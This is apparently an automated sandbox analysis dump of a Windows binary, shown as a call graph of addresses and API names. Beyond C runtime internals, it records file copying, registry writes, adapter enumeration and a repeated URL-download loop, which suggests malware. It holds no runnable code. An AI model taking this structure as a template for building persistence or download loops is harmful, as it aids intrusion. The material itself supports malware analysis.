19574->19573 19610 2db0f6d RtlLeaveCriticalSection 19575->19610 19577 2da9e62 19577->19467 19581 2da8997 RtlLeaveCriticalSection 19578->19581 19580 2db0c53 19580->19509 19581->19580 19594 2db0e84 19582->19594 19584 2daf842 19585 2daf84a 19584->19585 19586 2daf85b SetFilePointerEx 19584->19586 19587 2da5d9b __setmbcp 59 API calls 19585->19587 19588 2daf873 GetLastError 19586->19588 19590 2daf84f 19586->19590 19587->19590 19589 2da5d7a __dosmaperr 59 API calls 19588->19589 19589->19590 19590->19527 19607 2dadc4e 19591->19607 19595 2db0e8f 19594->19595 19596 2db0ea4 19594->19596 19597 2da5d67 __set_osfhnd 59 API calls 19595->19597 19599 2da5d67 __set_osfhnd 59 API calls 19596->19599 19601 2db0ec9 19596->19601 19598 2db0e94 19597->19598 19600 2da5d9b __setmbcp 59 API calls 19598->19600 19602 2db0ed3 19599->19602 19603 2db0e9c 19600->19603 19601->19584 19604 2da5d9b __setmbcp 59 API calls 19602->19604 19603->19584 19605 2db0edb 19604->19605 19606 2da4e35 _vscan_fn 9 API calls 19605->19606 19606->19603 19608 2da21bb _LocaleUpdate::_LocaleUpdate 59 API calls 19607->19608 19609 2dadc5f 19608->19609 19609->19573 19610->19577 19614 2db0f6d RtlLeaveCriticalSection 19611->19614 19613 2daf80e 19613->19503 19614->19613 19615->18280 19617 2d9e26d __EH_prolog 19616->19617 19618 2da3a8f _Allocate 60 API calls 19617->19618 19619 2d9e276 19618->19619 19620 2d91bfa RtlEnterCriticalSection 19619->19620 19622 2d9e484 19619->19622 19620->18285 19623 2d9e48e __EH_prolog 19622->19623 19626 2d926db RtlEnterCriticalSection 19623->19626 19625 2d9e4e4 19625->19620 19627 2d92728 CreateWaitableTimerA 19626->19627 19628 2d9277e 19626->19628 19629 2d92738 GetLastError 19627->19629 19630 2d9275b SetWaitableTimer 19627->19630 19631 2d927d5 RtlLeaveCriticalSection 19628->19631 19633 2da3a8f _Allocate 60 API calls 19628->19633 19632 2da0a50 Mailbox 68 API calls 19629->19632 19630->19628 19631->19625 19634 2d92745 19632->19634 19636 2d9278a 19633->19636 19670 2d91712 19634->19670 19637 2d927c8 19636->19637 19638 2da3a8f _Allocate 60 API calls 19636->19638 19676 2d97d36 19637->19676 19640 2d927a9 19638->19640 19642 2d91cf8 CreateEventA 19640->19642 19643 2d91d23 GetLastError 19642->19643 19644 2d91d52 CreateEventA 19642->19644 19647 2d91d33 19643->19647 19645 2d91d6b GetLastError 19644->19645 19664 2d91d96 19644->19664 19648 2d91d7b 19645->19648 19646 2da32fc __beginthreadex 201 API calls 19649 2d91db6 19646->19649 19650 2da0a50 Mailbox 68 API calls 19647->19650 19652 2da0a50 Mailbox 68 API calls 19648->19652 19653 2d91e0d 19649->19653 19654 2d91dc6 GetLastError 19649->19654 19651 2d91d3c 19650->19651 19655 2d91712 60 API calls 19651->19655 19656 2d91d84 19652->19656 19657 2d91e1d 19653->19657 19658 2d91e11 WaitForSingleObject CloseHandle 19653->19658 19659 2d91dd8 19654->19659 19660 2d91d4e 19655->19660 19661 2d91712 60 API calls 19656->19661 19657->19637 19658->19657 19662 2d91ddc CloseHandle 19659->19662 19663 2d91ddf 19659->19663 19660->19644 19661->19664 19662->19663 19665 2d91de9 CloseHandle 19663->19665 19666 2d91dee 19663->19666 19664->19646 19665->19666 19667 2da0a50 Mailbox 68 API calls 19666->19667 19668 2d91dfb 19667->19668 19669 2d91712 60 API calls 19668->19669 19669->19653 19671 2d9171c __EH_prolog 19670->19671 19672 2d9173e 19671->19672 19673 2d91815 Mailbox 59 API calls 19671->19673 19672->19630 19674 2d91732 19673->19674 19679 2d9a3d5 19674->19679 19677 2d97d52 19676->19677 19678 2d97d43 CloseHandle 19676->19678 19677->19631 19678->19677 19680 2d9a3df __EH_prolog 19679->19680 19687 2d9c93a 19680->19687 19684 2d9a400 19685 2da449a __CxxThrowException@8 RaiseException 19684->19685 19686 2d9a40e 19685->19686 19688 2d9b161 std::bad_exception::bad_exception 60 API calls 19687->19688 19689 2d9a3f2 19688->19689 19690 2d9c976 19689->19690 19691 2d9c980 __EH_prolog 19690->19691 19694 2d9b110 19691->19694 19693 2d9c9af Mailbox 19693->19684 19695 2d9b11a __EH_prolog 19694->19695 19696 2d9b161 std::bad_exception::bad_exception 60 API calls 19695->19696 19697 2d9b12b Mailbox 19696->19697 19697->19693 19709 2d930ae WSASetLastError 19698->19709 19701 2d930ae 71 API calls 19702 2d93c90 19701->19702 19703 2d916ae 19702->19703 19705 2d916b8 __EH_prolog 19703->19705 19704 2d91701 19704->18164 19705->19704 19706 2da2413 std::exception::exception 59 API calls 19705->19706 19707 2d916dc 19706->19707 19708 2d9a3d5 60 API calls 19707->19708 19708->19704 19710 2d930ec WSAStringToAddressA 19709->19710 19711 2d930ce 19709->19711 19713 2d9a43c 69 API calls 19710->19713 19711->19710 19712 2d930d3 19711->19712 19714 2da0a50 Mailbox 68 API calls 19712->19714 19715 2d93114 19713->19715 19724 2d930d8 19714->19724 19716 2d93154 19715->19716 19722 2d9311e _memcmp 19715->19722 19717 2d93135 19716->19717 19719 2da0a50 Mailbox 68 API calls 19716->19719 19718 2d93193 19717->19718 19720 2da0a50 Mailbox 68 API calls 19717->19720 19723 2da0a50 Mailbox 68 API calls 19718->19723 19718->19724 19719->19717 19720->19718 19721 2da0a50 Mailbox 68 API calls 19721->19717 19722->19717 19722->19721 19723->19724 19724->19701 19724->19702 19726 2d93bdd __EH_prolog 19725->19726 19727 2d93bfe htonl htonl 19726->19727 19737 2da23f7 19726->19737 19727->18300 19732 2d93c20 __EH_prolog 19731->19732 19733 2d93c41 19732->19733 19734 2da23f7 std::bad_exception::bad_exception 59 API calls 19732->19734 19733->18300 19735 2d93c35 19734->19735 19736 2d9a58a 60 API calls 19735->19736 19736->19733 19738 2da2413 std::exception::exception 59 API calls 19737->19738 19739 2d93bf2 19738->19739 19740 2d9a58a 19739->19740 19741 2d9a594 __EH_prolog 19740->19741 19748 2d9caad 19741->19748 19745 2d9a5af 19746 2da449a __CxxThrowException@8 RaiseException 19745->19746 19747 2d9a5bd 19746->19747 19755 2da23dc 19748->19755 19751 2d9cae9 19752 2d9caf3 __EH_prolog 19751->19752 19758 2d9b47f 19752->19758 19754 2d9cb22 Mailbox 19754->19745 19756 2da2453 std::exception::exception 59 API calls 19755->19756 19757 2d9a5a1 19756->19757 19757->19751 19759 2d9b489 __EH_prolog 19758->19759 19760 2da23dc std::bad_exception::bad_exception 59 API calls 19759->19760 19761 2d9b49a Mailbox 19760->19761 19761->19754 19763 2d93770 19762->19763 19764 2d93755 InterlockedCompareExchange 19762->19764 19766 2da0a50 Mailbox 68 API calls 19763->19766 19764->19763 19765 2d93765 19764->19765 19767 2d932ab 78 API calls 19765->19767 19768 2d93779 19766->19768 19767->19763 19769 2d929ee 76 API calls 19768->19769 19770 2d9378e 19769->19770 19770->18304 19800 2da35f0 19771->19800 19773 2d953c8 19773->18314 19774 2da3849 19773->19774 19775 2da3855 __setmbcp 19774->19775 19776 2da388b 19775->19776 19777 2da3873 19775->19777 19779 2da3883 __setmbcp 19775->19779 19942 2da9732 19776->19942 19778 2da5d9b __setmbcp 59 API calls 19777->19778 19781 2da3878 19778->19781 19779->18316 19783 2da4e35 _vscan_fn 9 API calls 19781->19783 19783->19779 19788 2da39d3 __setmbcp 19787->19788 19789 2da39e7 19788->19789 19791 2da39ff 19788->19791 19790 2da5d9b __setmbcp 59 API calls 19789->19790 19792 2da39ec 19790->19792 19793 2da9732 __lock_file 60 API calls 19791->19793 19796 2da39f7 __setmbcp 19791->19796 19794 2da4e35 _vscan_fn 9 API calls 19792->19794 19795 2da3a11 19793->19795 19794->19796 19969 2da395b 19795->19969 19796->18314 19803 2da35fc __setmbcp 19800->19803 19801 2da360e 19802 2da5d9b __setmbcp 59 API calls 19801->19802 19804 2da3613 19802->19804 19803->19801 19805 2da363b 19803->19805 19806 2da4e35 _vscan_fn 9 API calls 19804->19806 19819 2da9808 19805->19819 19814 2da361e @_EH4_CallFilterFunc@8 __setmbcp 19806->19814 19808 2da3640 19809 2da3649 19808->19809 19810 2da3656 19808->19810 19811 2da5d9b __setmbcp 59 API calls 19809->19811 19812 2da367f 19810->19812 19813 2da365f 19810->19813 19811->19814 19834 2da9927 19812->19834 19815 2da5d9b __setmbcp 59 API calls 19813->19815 19814->19773 19815->19814 19820 2da9814 __setmbcp 19819->19820 19821 2da882d __lock 59 API calls 19820->19821 19822 2da9822 19821->19822 19823 2da989d 19822->19823 19830 2da88b5 __mtinitlocknum 59 API calls 19822->19830 19832 2da9896 19822->19832 19854 2da9771 19822->19854 19859 2da97db 19822->19859 19825 2da89f4 __malloc_crt 59 API calls 19823->19825 19826 2da98a4 19825->19826 19829 2da914c __mtinitlocks InitializeCriticalSectionAndSpinCount 19826->19829 19826->19832 19828 2da9913 __setmbcp 19828->19808 19831 2da98ca RtlEnterCriticalSection 19829->19831 19830->19822 19831->19832 19864 2da991e 19832->19864 19844 2da9944 19834->19844 19835 2da9958 19836 2da5d9b __setmbcp 59 API calls 19835->19836 19838 2da995d 19836->19838 19837 2da9aff 19837->19835 19840 2da9b5b 19837->19840 19839 2da4e35 _vscan_fn 9 API calls 19838->19839 19842 2da368a 19839->19842 19875 2db0770 19840->19875 19851 2da36ac 19842->19851 19844->19835 19844->19837 19869 2db078e 19844->19869 19848 2db08bd __openfile 59 API calls 19849 2da9b17 19848->19849 19849->19837 19850 2db08bd __openfile 59 API calls 19849->19850 19850->19837 19935 2da97a1 19851->19935 19853 2da36b2 19853->19814 19855 2da977c 19854->19855 19856 2da9792 RtlEnterCriticalSection 19854->19856 19857 2da882d __lock 59 API calls 19855->19857 19856->19822 19858 2da9785 19857->19858 19858->19822 19860 2da97e9 19859->19860 19861 2da97fc RtlLeaveCriticalSection 19859->19861 19867 2da8997 RtlLeaveCriticalSection 19860->19867 19861->19822 19863 2da97f9 19863->19822 19868 2da8997 RtlLeaveCriticalSection 19864->19868 19866 2da9925 19866->19828 19867->19863 19868->19866 19878 2db07a6 19869->19878 19871 2da9ac5 19871->19835 19872 2db08bd 19871->19872 19886 2db08d5 19872->19886 19874 2da9af8 19874->19837 19874->19848 19893 2db0659 19875->19893 19877 2db0789 19877->19842 19879 2db07bb 19878->19879 19884 2db07b4 19878->19884 19880 2da21bb _LocaleUpdate::_LocaleUpdate 59 API calls 19879->19880 19881 2db07c8 19880->19881 19882 2da5d9b __setmbcp 59 API calls 19881->19882 19881->19884 19883 2db07fb 19882->19883 19885 2da4e35 _vscan_fn 9 API calls 19883->19885 19884->19871 19885->19884 19887 2da21bb _LocaleUpdate::_LocaleUpdate 59 API calls 19886->19887 19888 2db08e8 19887->19888 19889 2da5d9b __setmbcp 59 API calls 19888->19889 19892 2db08fd 19888->19892 19890 2db0929 19889->19890 19891 2da4e35 _vscan_fn 9 API calls 19890->19891 19891->19892 19892->19874 19896 2db0665 __setmbcp 19893->19896 19894 2db067b 19895 2da5d9b __setmbcp 59 API calls 19894->19895 19897 2db0680 19895->19897 19896->19894 19898 2db06b1 19896->19898 19899 2da4e35 _vscan_fn 9 API calls 19897->19899 19904 2db0722 19898->19904 19903 2db068a __setmbcp 19899->19903 19903->19877 19913 2da8176 19904->19913 19906 2db06cd 19909 2db06f6 19906->19909 19907 2db0736 19907->19906 19908 2da2eb4 _free 59 API calls 19907->19908 19908->19906 19910 2db06fc 19909->19910 19911 2db0720 19909->19911 19934 2db0f6d RtlLeaveCriticalSection 19910->19934 19911->19903 19914 2da8199 19913->19914 19915 2da8183 19913->19915 19914->19915 19916 2da81a0 ___crtIsPackagedApp 19914->19916 19917 2da5d9b __setmbcp 59 API calls 19915->19917 19920 2da81a9 AreFileApisANSI 19916->19920 19921 2da81b6 MultiByteToWideChar 19916->19921 19918 2da8188 19917->19918 19919 2da4e35 _vscan_fn 9 API calls 19918->19919 19929 2da8192 19919->19929 19920->19921 19922 2da81b3 19920->19922 19923 2da81d0 GetLastError 19921->19923 19924 2da81e1 19921->19924 19922->19921 19925 2da5d7a __dosmaperr 59 API calls 19923->19925 19926 2da89f4 __malloc_crt 59 API calls 19924->19926 19925->19929 19927 2da81e9 19926->19927 19928 2da81f0 MultiByteToWideChar 19927->19928 19927->19929 19928->19929 19930 2da8206 GetLastError 19928->19930 19929->19907 19931 2da5d7a __dosmaperr 59 API calls 19930->19931 19932 2da8212 19931->19932 19933 2da2eb4 _free 59 API calls 19932->19933 19933->19929 19934->19911 19936 2da97cf RtlLeaveCriticalSection 19935->19936 19937 2da97b0 19935->19937 19936->19853 19937->19936 19938 2da97b7 19937->19938 19941 2da8997 RtlLeaveCriticalSection 19938->19941 19940 2da97cc 19940->19853 19941->19940 19943 2da9742 19942->19943 19944 2da9764 RtlEnterCriticalSection 19942->19944 19943->19944 19945 2da974a 19943->19945 19946 2da3891 19944->19946 19947 2da882d __lock 59 API calls 19945->19947 19948 2da36f0 19946->19948 19947->19946 19951 2da36ff 19948->19951 19954 2da371d 19948->19954 19949 2da370d 19950 2da5d9b __setmbcp 59 API calls 19949->19950 19952 2da3712 19950->19952 19951->19949 19951->19954 19955 2da3737 _memmove 19951->19955 19953 2da4e35 _vscan_fn 9 API calls 19952->19953 19953->19954 19960 2da38c3 19954->19960 19955->19954 19956 2da5e41 __flsbuf 79 API calls 19955->19956 19958 2da9d71 __fflush_nolock 59 API calls 19955->19958 19959 2da9d95 __write 79 API calls 19955->19959 19963 2daa72f 19955->19963 19956->19955 19958->19955 19959->19955 19961 2da97a1 __fsopen 2 API calls 19960->19961 19962 2da38c9 19961->19962 19962->19779 19964 2daa742 19963->19964 19968 2daa766 19963->19968 19965 2da9d71 __fflush_nolock 59 API calls 19964->19965 19964->19968 19966 2daa75f 19965->19966 19967 2da9d95 __write 79 API calls 19966->19967 19967->19968 19968->19955 19970 2da396a 19969->19970 19971 2da397e 19969->19971 19972 2da5d9b __setmbcp 59 API calls 19970->19972 19973 2da397a 19971->19973 19975 2daa72f __flush 79 API calls 19971->19975 19974 2da396f 19972->19974 19985 2da3a36 19973->19985 19976 2da4e35 _vscan_fn 9 API calls 19974->19976 19977 2da398a 19975->19977 19976->19973 19988 2dab1db 19977->19988 19980 2da9d71 __fflush_nolock 59 API calls 19981 2da3998 19980->19981 19992 2dab066 19981->19992 19983 2da399e 19983->19973 19984 2da2eb4 _free 59 API calls 19983->19984 19984->19973 19986 2da97a1 __fsopen 2 API calls 19985->19986 19987 2da3a3c 19986->19987 19987->19796 19989 2dab1e8 19988->19989 19991 2da3992 19988->19991 19990 2da2eb4 _free 59 API calls 19989->19990 19989->19991 19990->19991 19991->19980 19993 2dab072 __setmbcp 19992->19993 19994 2dab07f 19993->19994 19995 2dab096 19993->19995 19996 2da5d67 __set_osfhnd 59 API calls 19994->19996 19997 2dab121 19995->19997 19999 2dab0a6 19995->19999 19998 2dab084 19996->19998 20000 2da5d67 __set_osfhnd 59 API calls 19997->20000 20001 2da5d9b __setmbcp 59 API calls 19998->20001 20002 2dab0ce 19999->20002 20003 2dab0c4 19999->20003 20004 2dab0c9 20000->20004 20014 2dab08b __setmbcp 20001->20014 20006 2db0bc7 ___lock_fhandle 60 API calls 20002->20006 20005 2da5d67 __set_osfhnd 59 API calls 20003->20005 20008 2da5d9b __setmbcp 59 API calls 20004->20008 20005->20004 20007 2dab0d4 20006->20007 20009 2dab0f2 20007->20009 20010 2dab0e7 20007->20010 20011 2dab12d 20008->20011 20015 2da5d9b __setmbcp 59 API calls 20009->20015 20018 2dab141 20010->20018 20012 2da4e35 _vscan_fn 9 API calls 20011->20012 20012->20014 20014->19983 20016 2dab0ed 20015->20016 20033 2dab119 20016->20033 20019 2db0e84 __chsize_nolock 59 API calls 20018->20019 20022 2dab14f 20019->20022 20020 2dab1a5 20036 2db0dfe 20020->20036 20022->20020 20024 2db0e84 __chsize_nolock 59 API calls 20022->20024 20032 2dab183 20022->20032 20026 2dab17a 20024->20026 20025 2db0e84 __chsize_nolock 59 API calls 20027 2dab18f CloseHandle 20025->20027 20029 2db0e84 __chsize_nolock 59 API calls 20026->20029 20027->20020 20030 2dab19b GetLastError 20027->20030 20028 2da5d7a __dosmaperr 59 API calls 20031 2dab1cf 20028->20031 20029->20032 20030->20020 20031->20016 20032->20020 20032->20025 20045 2db0f6d RtlLeaveCriticalSection 20033->20045 20035 2dab11f 20035->20014 20037 2db0e6a 20036->20037 20038 2db0e0a 20036->20038 20039 2da5d9b __setmbcp 59 API calls 20037->20039 20038->20037 20043 2db0e33 20038->20043 20040 2db0e6f 20039->20040 20041 2da5d67 __set_osfhnd 59 API calls 20040->20041 20042 2dab1ad 20041->20042 20042->20028 20042->20031 20043->20042 20044 2db0e55 SetStdHandle 20043->20044 20044->20042 20045->20035 20046 40b2f3 20047 40b322 20046->20047 20050 2da3c52 20047->20050 20051 2da3c5b 20050->20051 20052 2da3c60 20050->20052 20064 2dab821 20051->20064 20056 2da3c75 20052->20056 20055 40ba55 20057 2da3c81 __setmbcp 20056->20057 20061 2da3ccf ___DllMainCRTStartup 20057->20061 20063 2da3d2c __setmbcp 20057->20063 20068 2da3ae0 20057->20068 20059 2da3d09 20060 2da3ae0 __CRT_INIT@12 138 API calls 20059->20060 20059->20063 20060->20063 20061->20059 20062 2da3ae0 __CRT_INIT@12 138 API calls 20061->20062 20061->20063 20062->20059 20063->20055 20065 2dab851 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 20064->20065 20066 2dab844 20064->20066 20067 2dab848 20065->20067 20066->20065 20066->20067 20067->20052 20069 2da3aec __setmbcp 20068->20069 20070 2da3b6e 20069->20070 20071 2da3af4 20069->20071 20073 2da3b72 20070->20073 20074 2da3bd7 20070->20074 20116 2da8126 GetProcessHeap 20071->20116 20078 2da3b93 20073->20078 20109 2da3afd __CRT_INIT@12 __setmbcp 20073->20109 20217 2da839b 20073->20217 20076 2da3c3a 20074->20076 20077 2da3bdc 20074->20077 20075 2da3af9 20075->20109 20117 2da5cd4 20075->20117 20080 2da5b64 __freeptd 59 API calls 20076->20080 20076->20109 20079 2da910b __getptd_noexit TlsGetValue 20077->20079 20220 2da8272 RtlDecodePointer 20078->20220 20083 2da3be7 20079->20083 20080->20109 20087 2da89ac __calloc_crt 59 API calls 20083->20087 20083->20109 20085 2da3b09 __RTC_Initialize 20093 2da3b19 GetCommandLineA 20085->20093 20085->20109 20090 2da3bf8 20087->20090 20088 2da3ba9 __CRT_INIT@12 20244 2da3bc2 20088->20244 20094 2da912a __getptd_noexit TlsSetValue 20090->20094 20090->20109 20091 2dab4bf __ioterm 60 API calls 20092 2da3ba4 20091->20092 20095 2da5d4a __mtterm 62 API calls 20092->20095 20138 2dab8bd GetEnvironmentStringsW 20093->20138 20097 2da3c10 20094->20097 20095->20088 20099 2da3c2e 20097->20099 20100 2da3c16 20097->20100 20102 2da2eb4 _free 59 API calls 20099->20102 20104 2da5c21 __initptd 59 API calls 20100->20104 20102->20109 20103 2da3b33 20105 2da3b37 20103->20105 20170 2dab511 20103->20170 20106 2da3c1e GetCurrentThreadId 20104->20106 20203 2da5d4a 20105->20203 20106->20109 20109->20061 20111 2da3b57 20111->20109 20212 2dab4bf 20111->20212 20116->20075 20248 2da8442 RtlEncodePointer 20117->20248 20119 2da5cd9 20253 2da895e 20119->20253 20122 2da5ce2 20123 2da5d4a __mtterm 62 API calls 20122->20123 20126 2da5ce7 20123->20126 20126->20085 20127 2da5cff 20128 2da89ac __calloc_crt 59 API calls 20127->20128 20129 2da5d0c 20128->20129 20130 2da5d41 20129->20130 20131 2da912a __getptd_noexit TlsSetValue 20129->20131 20132 2da5d4a __mtterm 62 API calls 20130->20132 20133 2da5d20 20131->20133 20134 2da5d46 20132->20134 20133->20130 20135 2da5d26 20133->20135 20134->20085 20136 2da5c21 __initptd 59 API calls 20135->20136 20137 2da5d2e GetCurrentThreadId 20136->20137 20137->20085 20139 2dab8d0 WideCharToMultiByte 20138->20139 20143 2da3b29 20138->20143 20141 2dab93a FreeEnvironmentStringsW 20139->20141 20142 2dab903 20139->20142 20141->20143 20144 2da89f4 __malloc_crt 59 API calls 20142->20144 20151 2dab20b 20143->20151 20145 2dab909 20144->20145 20145->20141 20146 2dab910 WideCharToMultiByte 20145->20146 20147 2dab92f FreeEnvironmentStringsW 20146->20147 20148 2dab926 20146->20148 20147->20143 20149 2da2eb4 _free 59 API calls 20148->20149 20150 2dab92c 20149->20150 20150->20147 20152 2dab217 __setmbcp 20151->20152 20153 2da882d __lock 59 API calls 20152->20153 20154 2dab21e 20153->20154 20155 2da89ac __calloc_crt 59 API calls 20154->20155 20157 2dab22f 20155->20157 20156 2dab29a GetStartupInfoW 20164 2dab2af 20156->20164 20167 2dab3de 20156->20167 20157->20156 20158 2dab23a @_EH4_CallFilterFunc@8 __setmbcp 20157->20158 20158->20103 20159 2dab4a6 20261 2dab4b6 20159->20261 20161 2da89ac __calloc_crt 59 API calls 20161->20164 20162 2dab42b GetStdHandle 20162->20167 20163 2dab43e GetFileType 20163->20167 20164->20161 20165 2dab2fd 20164->20165 20164->20167 20166 2dab331 GetFileType 20165->20166 20165->20167 20168 2da914c __mtinitlocks InitializeCriticalSectionAndSpinCount 20165->20168 20166->20165 20167->20159 20167->20162 20167->20163 20169 2da914c __mtinitlocks InitializeCriticalSectionAndSpinCount 20167->20169 20168->20165 20169->20167 20171 2dab51f 20170->20171 20172 2dab524 GetModuleFileNameA 20170->20172 20271 2da51ca 20171->20271 20173 2dab551 20172->20173 20265 2dab5c4 20173->20265 20176 2da3b43 20176->20111 20181 2dab740 20176->20181 20178 2da89f4 __malloc_crt 59 API calls 20179 2dab58a 20178->20179 20179->20176 20180 2dab5c4 _parse_cmdline 59 API calls 20179->20180 20180->20176 20182 2dab749 20181->20182 20184 2dab74e _strlen 20181->20184 20183 2da51ca ___initmbctable 71 API calls 20182->20183 20183->20184 20185 2da89ac __calloc_crt 59 API calls 20184->20185 20188 2da3b4c 20184->20188 20193 2dab784 _strlen 20185->20193 20186 2dab7d6 20188->20111 20197 2da83aa 20188->20197 20189 2da89ac __calloc_crt 59 API calls 20189->20193 20190 2dab7fd 20193->20186 20193->20188 20193->20189 20193->20190 20194 2dab814 20193->20194 20385 2da6bfc 20193->20385 20195 2da4e45 __invoke_watson 8 API calls 20194->20195 20199 2da83b6 __IsNonwritableInCurrentImage 20197->20199 20204 2da5d5a 20203->20204 20205 2da5d54 20203->20205 20207 2da8877 RtlDeleteCriticalSection 20204->20207 20208 2da8893 20204->20208 20397 2da90ec 20205->20397 20209 2da2eb4 _free 59 API calls 20207->20209 20210 2da889f RtlDeleteCriticalSection 20208->20210 20211 2da88b2 20208->20211 20209->20204 20210->20208 20211->20109 20216 2dab4c6 20212->20216 20213 2dab50e 20213->20105 20214 2da2eb4 _free 59 API calls 20214->20216 20215 2dab4df RtlDeleteCriticalSection 20215->20216 20216->20213 20216->20214 20216->20215 20218 2da84e4 _doexit 59 API calls 20217->20218 20219 2da83a6 20218->20219 20219->20078 20221 2da828c 20220->20221 20222 2da829e 20220->20222 20221->20222 20224 2da2eb4 _free 59 API calls 20221->20224 20223 2da2eb4 _free 59 API calls 20222->20223 20225 2da82ab 20223->20225 20224->20221 20226 2da82cf 20225->20226 20229 2da2eb4 _free 59 API calls 20225->20229 20227 2da2eb4 _free 59 API calls 20226->20227 20228 2da82db 20227->20228 20230 2da2eb4 _free 59 API calls 20228->20230 20229->20225 20231 2da82ec 20230->20231 20232 2da2eb4 _free 59 API calls 20231->20232 20233 2da82f7 20232->20233 20234 2da831c RtlEncodePointer 20233->20234 20238 2da2eb4 _free 59 API calls 20233->20238 20235 2da8337 20234->20235 20236 2da8331 20234->20236 20237 2da834d 20235->20237 20240 2da2eb4 _free 59 API calls 20235->20240 20239 2da2eb4 _free 59 API calls 20236->20239 20241 2da3b98 20237->20241 20243 2da2eb4 _free 59 API calls 20237->20243 20242 2da831b 20238->20242 20239->20235 20240->20237 20241->20088 20241->20091 20242->20234 20243->20241 20245 2da3bc6 20244->20245 20246 2da3bd4 20244->20246 20245->20246 20247 2da5d4a __mtterm 62 API calls 20245->20247 20246->20109 20247->20246 20249 2da8453 __init_pointers __initp_misc_winsig 20248->20249 20260 2da394a RtlEncodePointer 20249->20260 20251 2da846b __init_pointers 20252 2da91ba 34 API calls 20251->20252 20252->20119 20254 2da896a 20253->20254 20255 2da914c __mtinitlocks InitializeCriticalSectionAndSpinCount 20254->20255 20256 2da5cde 20254->20256 20255->20254 20256->20122 20257 2da90ce 20256->20257 20258 2da5cf4 20257->20258 20259 2da90e5 TlsAlloc 20257->20259 20258->20122 20258->20127 20260->20251 20264 2da8997 RtlLeaveCriticalSection 20261->20264 20263 2dab4bd 20263->20158 20264->20263 20267 2dab5e6 20265->20267 20270 2dab64a 20267->20270 20275 2db1516 20267->20275 20268 2dab567 20268->20176 20268->20178 20269 2db1516 _parse_cmdline 59 API calls 20269->20270 20270->20268 20270->20269 20272 2da51d3 20271->20272 20273 2da51da 20271->20273 20281 2da5527 20272->20281 20273->20172 20278 2db14bc 20275->20278 20279 2da21bb _LocaleUpdate::_LocaleUpdate 59 API calls 20278->20279 20280 2db14ce 20279->20280 20280->20267 20282 2da5533 __setmbcp 20281->20282 20283 2da5b9a __setmbcp 59 API calls 20282->20283 20284 2da553b 20283->20284 20285 2da5481 __setmbcp 59 API calls 20284->20285 20286 2da5545 20285->20286 20306 2da5222 20286->20306 20307 2da21bb _LocaleUpdate::_LocaleUpdate 59 API calls 20306->20307 20308 2da5232 20307->20308 20309 2da5253 20308->20309 20310 2da5241 GetOEMCP 20308->20310 20386 2da6c15 20385->20386 20387 2da6c07 20385->20387 20387->20386 20398 2da9103 TlsFree 20397->20398 20399 2da90ff 20397->20399 20398->20204 20399->20204 20400 2d9104d 20401 2da32e7 __cinit 68 API calls 20400->20401 20402 2d91057 20401->20402 20405 2d91aa9 InterlockedIncrement 20402->20405 20406 2d9105c 20405->20406 20407 2d91ac5 WSAStartup InterlockedExchange 20405->20407 20407->20406 20408 4022b4 GetLastError 20409 40b222 LoadLibraryExA 20408->20409 20411 40b255 Sleep 20412 40b059 CommandLineToArgvW 20413 40b108 GetLocalTime 20412->20413 20416 401f27 20413->20416 20417 401f3c 20416->20417 20420 401a1d 20417->20420 20419 401f45 20421 401a2c 20420->20421 20426 401a4f CreateFileA 20421->20426 20425 401a3e 20425->20419 20427 401a35 20426->20427 20429 401a7d 20426->20429 20434 401b4b LoadLibraryA 20427->20434 20428 401a98 DeviceIoControl 20428->20429 20429->20428 20431 401b3a CloseHandle 20429->20431 20432 401b0e GetLastError 20429->20432 20443 402ba6 20429->20443 20446 402b98 20429->20446 20431->20427 20432->20429 20432->20431 20435 401c21 20434->20435 20436 401b6e GetProcAddress 20434->20436 20435->20425 20437 401c18 FreeLibrary 20436->20437 20441 401b85 20436->20441 20437->20435 20438 401b95 GetAdaptersInfo 20438->20441 20439 402ba6 7 API calls 20439->20441 20440 401c15 20440->20437 20441->20438 20441->20439 20441->20440 20442 402b98 12 API calls 20441->20442 20442->20441 20444 402f51 7 API calls 20443->20444 20445 402baf 20444->20445 20445->20429 20447 402eb1 12 API calls 20446->20447 20448 402ba3 20447->20448 20448->20429 20449 4027ba 20450 4027c3 CopyFileA 20449->20450 20452 402770 20449->20452 20450->20452 20452->20452 20453 40b87b 20456 40212f 20453->20456 20457 402551 VirtualAlloc 20456->20457 20459 40b4dc 20460 40b888 RegCloseKey 20459->20460 20461 40b11d 20462 40b12d RegQueryValueExA 20461->20462 20464 2df7262 20465 2dfccae CreateFileA 20464->20465 20466 40269e RegSetValueExA 20467 402728 RegCloseKey 20466->20467 20468 4025da 20467->20468

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 2d972ab-2d972c3 InternetOpenA 1 2d97389-2d9738f 0->1 2 2d972c9-2d9731d InternetSetOptionA * 3 call 2da4a30 0->2 4 2d973ab-2d973b9 1->4 5 2d97391-2d97397 1->5 6 2d97322-2d97340 InternetOpenUrlA 2->6 9 2d973bf-2d973e3 call 2da4a30 call 2d9439c 4->9 10 2d966f4-2d966f6 4->10 7 2d97399-2d9739b 5->7 8 2d9739d-2d973aa call 2d953ec 5->8 11 2d97382-2d97383 InternetCloseHandle 6->11 12 2d97342 6->12 7->4 8->4 9->10 31 2d973e9-2d97417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2da227c 9->31 13 2d966f8-2d966fd 10->13 14 2d966ff-2d96701 10->14 11->1 18 2d97346-2d9736c InternetReadFile 12->18 19 2d96708 Sleep 13->19 20 2d9670e-2d96742 RtlEnterCriticalSection RtlLeaveCriticalSection 14->20 21 2d96703 14->21 24 2d9736e-2d97375 18->24 25 2d97377-2d9737e InternetCloseHandle 18->25 19->20 26 2d96792 20->26 27 2d96744-2d96750 20->27 21->19 24->18 25->11 30 2d96796 26->30 27->26 29 2d96752-2d9675f 27->29 32 2d96761-2d96765 29->32 33 2d96767-2d96768 29->33 30->0 38 2d97419-2d9742b call 2da227c 31->38 39 2d9746d-2d97488 call 2da227c 31->39 34 2d9676c-2d96790 call 2da4a30 * 2 32->34 33->34 34->30 38->39 49 2d9742d-2d9743f call 2da227c 38->49 47 2d9748e-2d97490 39->47 48 2d97742-2d97754 call 2da227c 39->48 47->48 50 2d97496-2d97548 call 2da2eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2da4a30 * 5 call 2d9439c * 2 47->50 57 2d9779d-2d977a6 call 2da227c 48->57 58 2d97756-2d97758 48->58 49->39 59 2d97441-2d97453 call 2da227c 49->59 114 2d9754a-2d9754c 50->114 115 2d97585 50->115 66 2d977ab-2d977af 57->66 58->57 61 